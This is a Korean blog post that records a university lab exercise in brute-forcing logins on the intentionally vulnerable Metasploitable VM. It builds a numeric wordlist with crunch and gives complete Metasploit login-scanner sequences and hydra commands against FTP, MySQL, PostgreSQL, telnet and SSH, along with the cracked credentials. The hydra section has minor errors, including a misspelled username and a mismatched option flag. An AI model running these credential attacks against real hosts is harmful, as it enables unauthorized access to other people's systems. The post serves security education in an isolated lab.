[모의 해킹] Metasploitable을 이용한 무차별 대입 공격

! 이 포스트의 내용은 2019년 전공 강의에서 다룬 리눅스 보안 실습의 기록용이며, 이는 학습 목적으로만 사용되어야 합니다.

! 어떠한 경우에도 이러한 기술을 악용하거나 불법적인 활동에 사용해서는 안 됩니다.

 

! 모의 해킹과 관련된 실습은 합법적인 환경에서만 수행되어야 하며, 무단으로 다른 사람의 시스템에 접근하는 등의 행위는 법적인 문제로 이어질 수 있습니다. 이러한 기술을 사용할 때에는 항상 윤리적인 책임을 갖고 행동해야 합니다.

 

 

1️⃣ 무차별 대입 공격이란?

가능한 모든 조합의 키나 비밀번호를 체계적으로 시도하여 올바른 값을 찾아내는 방식이다.

이 공격은 단순하지만, 강력한 암호화 또는 충분히 긴 비밀번호를 사용하는 경우 시간과 자원 면에서 비효율적일 수 있다.

---

2️⃣ 실습 환경

실습에서는 모의 침투 연습을 위해 Metasploitable을 사용한다.

Metasploitable은 보안 연구 및 교육 목적으로 사용되는 취약한 가상 머신이다. 

Metasploitable은 의도적으로 여러 보안 취약점을 포함하고 있어, 실제 환경에서 해킹 연습을 하고 보안 툴을 테스트하는 데 유용하다.

 

🔹 1. root 계정 password 설정

Metasploitable 실행 및 로그인

root 계정 password 설정

---

🔹 2. MySQL 데이터베이스 root 비밀번호 변경

~$ mysql -u root -p

> use mysql;
> update user set password=password('1234') where user='root';
> flush privileges;

---

3️⃣ Crunch 기능을 이용하여 공격용 패스워드 작성

🔹1. charset.lst 파일 내용 확인하기

``charset.lst`` 파일은 Crunch에서 사용할 수 있는 미리 정의된 문자 세트를 저장한 파일이다. 이 파일을 확인하면 특정 언어나  패턴에 맞는 문자 세트를 쉽게 불러와서 사용할 수 있다.

~# cat /usr/share/crunch/charset.lst

 

---

🔹2. 패스워드 리스트 생성

• crunch 도구를 사용하여 숫자로 구성된 1~6자리 길이의 모든 가능한 비밀번호 조합을 생성
• 생성 결과를 파일로 저장
• 파일에는 0부터 999999까지의 비밀번호가 저장 됨

~# crunch 1 6 -f /usr/share/crunch/charset.lst numeric -o /root/passwords_6.txt

• ``crunch 1 6`` → 최소 1자리, 최대 6자리 조합 생성
• ``-f /usr/share/crunch/charset.lst numeric`` → 숫자(``0123456789``)만 사용
• ``-o /root/passwords_6.txt`` → 결과를 ``/root/passwords_6.txt`` 파일에 저장

---

🔹2. 패스워드 파일에 postgres 패스워드 추가

• cat 명령어로 패스워드 파일에 postgres 패스워드를 추가한다.

~# cat >> /root/passwords_6.txt

• 0부터 999999까지 숫자를 모두 대입하기에는 많은 시간이 걸리므로 여기서는 빠른 실습을 위해 간단한 패스워드 파일을 작성한다.

---

🔹3. ID 리스트 파일 생성

• user.txt라는 이름의 공격 대상 ID가 저장된 파일을 생성한다.

---

4️⃣ Metasploitable FTP 서버 무차별 대입 공격 (Msfconsole 이용)

• FTP 로그인 시도를 자동화하는 과정
• 스캐너를 사용하여 주어진 사용자명과 비밀번호 리스트를 통해 지정된 FTP 서버에 대해 무차별 대입 공격 수행 

> use auxiliary/scanner/ftp/ftp_login

> set rhosts 192.168.255.148
> set user_file /root/users.txt
> set pass_file /root/password_short.txt
> set stop_on_success true
> set threads 256
> run

• ``use auxiliary/scanner/ftp/ftp_login`` : FTP 로그인 시도를 위한 스캐너 모듈을 선택
• ``set rhosts 192.168.255.148`` : 공격 대상 IP  주소를 설정
• ``set user_file /root/users.txt`` : 앞에서 생성했던 공격대상 ID 리스트가 포함된 파일의 경로를 설정
• ``set pass_file /root/password_short.txt`` : 앞에서 생성했던 비밀번호 파일의 경로를 설정
• ``set stop_on_success true`` : 로그인 공격에 성공하면 공격을 중지하도록 설정
• ``set threads 256`` : 스레드 수 설정
• ``run`` :실행

• 무차별 대입공격 중 ID는 postgres, 패스워드는 postgres로 로그인이 성공하여 종료된 것을 볼 수 있다.

---

5️⃣ 다른 서버들 무차별 대입 공격

FTP 서버 외에도 다른 서버들로 무차별 대입을 통해 공격을 수행해 보았다.

---

🔹1. Metasploitable MySQL 서버 무차별 대입 공격 (Msfconsole 이용)

• MySQL 서버
• 명령어는 동일
• 스캐너 모듈 선택 시 ``mysql/mysql_login`` 모듈을 선택하고, ``3306``으로 포트를 지정

> use auxiliary/scanner/mysql/mysql_login

> set rhosts 192.168.255.148
> set rport 3306
> set user_file /root/users.txt
> set pass_file /root/password_short.txt
> set stop_on_success true
> set threads 256
> run

• 명령어 실행하여 공격 실행

• 무차별 대입공격 중 ID는 root, 패스워드는 1234로 로그인이 성공하여 종료된 것을 볼 수 있다.

---

🔹2. Metasploitable postgreSQL 서버 무차별 대입 공격 (Msfconsole 이용)

• postgreSQL 서버
• 명령어는 동일
• 스캐너 모듈 선택 시 ``postgres/postgres_login`` 모듈을 선택하고, ``5432``로 포트를 지정

> use auxiliary/scanner/postgres/postgres_login

> set rhosts 192.168.255.148
> set rport 5432
> set user_file /root/users.txt
> set pass_file /root/password_short.txt
> set stop_on_success true
> set threads 256
> run

• 명령어 실행하여 공격 실행

• 무차별 대입공격 중 ID는 postgres, 패스워드는 postgres@template1로 로그인이 성공하여 종료된 것을 볼 수 있다.

---

🔹3. Metasploitable telnet 서버 무차별 대입 공격 (Msfconsole 이용)

• telnet 서버
• 명령어는 동일
• 스캐너 모듈 선택 시 ``telnet/telnet_login`` 모듈을 선택. 포트는 기본포트(``23``)로 자동으로 스캔됨.

> use auxiliary/scanner/telnet/telnet_login

> set rhosts 192.168.255.148
> set user_file /root/users.txt
> set pass_file /root/password_short.txt
> set stop_on_success true
> set threads 256
> run

• 명령어 실행하여 공격 실행

• 무차별 대입공격 중 ID는 root, 패스워드는 123456으로 로그인이 성공하여 종료된 것을 볼 수 있다.

---

🔹4. Metasploitable SSH 서버 무차별 대입 공격 (Msfconsole 이용)

• SSH 서버
• 명령어는 동일
• 스캐너 모듈 선택 시 ``ssh/ssh_login`` 모듈을 선택. 포트는 기본포트(``22``)로 자동으로 스캔됨.

> use auxiliary/scanner/ssh/ssh_login

> set rhosts 192.168.255.148
> set user_file /root/users.txt
> set pass_file /root/password_short.txt
> set stop_on_success true
> set threads 256
> run

• 명령어 실행하여 공격 실행
• 무차별 대입공격 중 ID는 root, 패스워드는 123456으로 로그인이 성공하여 종료된 것을 볼 수 있다.

---

🔹5. Metasploitable FTP 서버 무차별 대입 공격 (hydra 이용)

• hydra를 이용한 FTP 무차별 대입 공격

~# hydra -l postgrs -P /root/password_short.txt -f 192.168.255.148 ftp

• ``-L postgrs``: 사용자 이름을 하나만 지정하는 옵션. ``postgres``라는 사용자를 대상으로 공격 수행.
• ``-P /root/password_short.txt``: 비밀번호 리스트. 이 파일에 들어있는 비밀번호들로 순차적으로 시도.
• ``-f```: 첫 번째 성공 시도 후 공격을 멈추는 옵션 (로그인 성공 시 즉시 종료)
• ``192.168.255.148``: 공격 대상 IP (Metasploitable 시스템)
• ``ftp``: FTP 프로토콜을 대상으로 하는 공격.

• 명령어 실행하여 공격 실행
• 무차별 대입공격 중 ID는 postgres, 패스워드는 postgres으로 로그인이 성공하여 종료된 것을 볼 수 있다.

---

🔹6. Metasploitable SSH 서버 무차별 대입 공격 (hydra 이용)

• hydra를 이용한 SSH 무차별 대입 공격
• 명령어는 동일
• 마지막 옵션 ``ssh``로 지정

~# hydra -l root -P /root/password_short.txt -f 192.168.255.148 ssh

• 명령어 실행하여 공격 실행
• 무차별 대입공격 중 ID는 root, 패스워드는 123456으로 로그인이 성공하여 종료된 것을 볼 수 있다.

---

🔹7. Metasploitable telnet 서버 무차별 대입 공격 (hydra 이용)

• hydra를 이용한 SSH 무차별 대입 공격
• 명령어는 동일
• 마지막 옵션 ``telnet``로 지정

~# hydra -l root -P /root/password_short.txt -f 192.168.255.148 telnet

• 명령어 실행하여 공격 실행
• 무차별 대입공격 중 ID는 root, 패스워드는 123456으로 로그인이 성공하여 종료된 것을 볼 수 있다.